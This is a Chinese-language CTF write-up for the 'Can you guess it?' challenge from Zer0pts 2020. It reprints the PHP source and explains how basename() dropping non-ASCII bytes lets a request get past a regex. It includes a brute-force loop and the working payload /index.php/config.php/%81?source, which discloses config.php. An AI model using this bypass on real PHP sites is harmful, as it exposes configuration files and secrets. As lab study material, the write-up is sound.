buu-[Zer0pts2020]Can you guess it?

有源码直接看源码了
buu-[Zer0pts2020]Can you guess it?_第1张图片


include 'config.php'; // FLAG is defined in config.php

if (preg_match('/config\.php\/*$/i', $_SERVER['PHP_SELF'])) {
     
  exit("I don't know what you are thinking, but I won't let you read it :)");
}

if (isset($_GET['source'])) {
     
  highlight_file(basename($_SERVER['PHP_SELF']));
  exit();
}

$secret = bin2hex(random_bytes(64));
if (isset($_POST['guess'])) {
     
  $guess = (string) $_POST['guess'];
  if (hash_equals($secret, $guess)) {
     
    $message = 'Congratulations! The flag is: ' . FLAG;
  } else {
     
    $message = 'Wrong.';
  }
}
?>

源码审计

有关于$_SERVER[‘PHP_SELF’]。

(preg_match('/config\.php\/*$/i', $_SERVER['PHP_SELF']))

不能以config.php结尾
secret反正猜不着,

那么就要好好利用basename($_SERVER[‘PHP_SELF’])了
basename() 函数会返回路径中的文件名部分
假如路径是/index.php/config.php
basename后会返回config.php,就算后面跟上多余的字符也会返回文件名部分

在官方的英文描述中

With the default locale setting “C”, basename() drops non-ASCII-chars
at the beginning of a filename.

basename()函数会去掉文件名开头的非ASCII值
ASCII值范围为0-255,但ASCII码并没有规定编号为128~255的字符(大于%ff的会报错400 Bad Request)
ASCII表范围为0-127,也就是我们传入128(%80)以上的数值,即可绕过正则
除此以为根据题目提示我们读取flag还需要用到?source
跑一跑

 <?php
for ($i=80; $i < 255; $i++) {
     
    $filename='config.php/'.chr($i);
    if (!preg_match('/config\.php\/*$/i', $filename)){
     
        if(basename($filename)=='config.php'){
     
            echo dechex($i).'  ';
        }
    }
}

buu-[Zer0pts2020]Can you guess it?_第2张图片

%5c是反斜杠,会报错剩下的80-ff随便带一个就行
Payload: /index.php/config.php/%81?source
在这里插入图片描述

你可能感兴趣的